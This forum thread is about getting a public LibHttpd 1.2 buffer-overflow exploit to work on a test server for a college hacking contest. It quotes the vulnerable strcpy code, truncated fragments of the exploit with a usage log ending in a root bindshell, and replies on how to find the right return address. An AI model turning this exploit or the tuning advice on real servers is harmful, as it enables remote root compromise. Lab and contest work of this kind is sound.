Results 1 to 5 of 5

Thread: LibHttp 1.2 BO exploit Help

  1. #1
    Senior Member PacketThirst's Avatar
    Join Date
    Aug 2004

    Question LibHttp 1.2 BO exploit Help

    Hey !

    I'm trying to organise a hacking contest for my college. I've decided to use LibHttpd 1.2, a very basic web server. This version is prone to a BO.

    The Following is the vulnerable part of the code

    860 void httpdProcessRequest(server)
    861 httpd *server;
    862 {
    863 char dirName[HTTP_MAX_URL],
    869 server->response.responseLength = 0;
    870 strcpy(dirName, httpdRequestPath(server)); // here.

    So, i setup a small test server on my Slackware box. I tried the following exploit code
    ** Lib HTTPd Remote Buffer Overflow exploit
    ** by Xpl017Elz
    ** __
    ** Testing exploit:
    ** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80
    ** (Ctrl+c)
    ** punt!
    ** bash$ nc libhttphost 3879
    ** uname
    ** Linux
    ** id
    ** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),
    ** 3(sys),4(adm),6(disk),10(wheel)
    ** exit
    ** bash$
    ** --
    ** exploit by "you dong-hun"(Xpl017Elz), <szoahc_at_hotmail.com>.
    ** My World: http://x82.i21c.net

    #include <stdio.h>
    int main(/* args? */)
    int shadd2r;
    char b1ndsh[] = /* 129byte bindshellcode */
    //--- POST &shellcode ---//
    fprintf(stdout,"POST ");
    {/* rEDhAT Default: 0x804e482,
    Debian Address? */
    //--- NOP,shellcode ---//
    {/* SSSSSSSS...SSSSSSSSS;;; */

    After executing the exploit, the web server crashed and gave a segmentation fault error. It wasnt able to keep a port open.I'm not all that good at debugging. Could some one please tell me what went wrong ?.


    Thanks a lot in advance

  2. #2
    Elite Hacker
    Join Date
    Mar 2003
    Looks like it was written to be run against a redhat box running the server. Perhaps the return address is different on slackware and that's why it's segfaulting. Fool around with it a bit. You can probably get it to work. Good luck.

  3. #3
    Senior Member PacketThirst's Avatar
    Join Date
    Aug 2004
    Thanks for the reply Heretic. But, how do i find the return address for a slackware box ?. Can
    it be found using GDB ?.

  4. #4
    Elite Hacker
    Join Date
    Mar 2003
    I would change libhttp 1.2's code from where you pasted to print out the address of dirName.
    fprintf(stderr, "0x%x\n", dirName);
    Then recompile and run it. Then make a request and see the address it prints out. You will want to make that your return address. You may have to nudge it around a bit though. Actually. That will probably be way off from the return address you want. It looks like the code sends the return address, then a nop sled, then the shellcode. So the shellcode will be way ahead of the address of dirName. I'm pretty sure dirName will only contain the return address. and the return address is probably another variable which they put the shellcode. They probably store stuff in new variables based on lines in the request. so when the attacker sends \r\n, it stores what follows in a new variable I'm guessing. So you will want the address of another char[] as your return address. I'm sort of typing as I think about it, so that's why I'm contradicting myself a lot :P. Hopefully what I said helps. Good luck.

  5. #5
    Senior Member PacketThirst's Avatar
    Join Date
    Aug 2004
    I don't quite understand how the initial 1024 bytes of the buffer is filled with the return address. Is " fprintf(stdout,"\202\344\004\b");" the representation of 0x804e482 ?. If so, how does it go ??

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts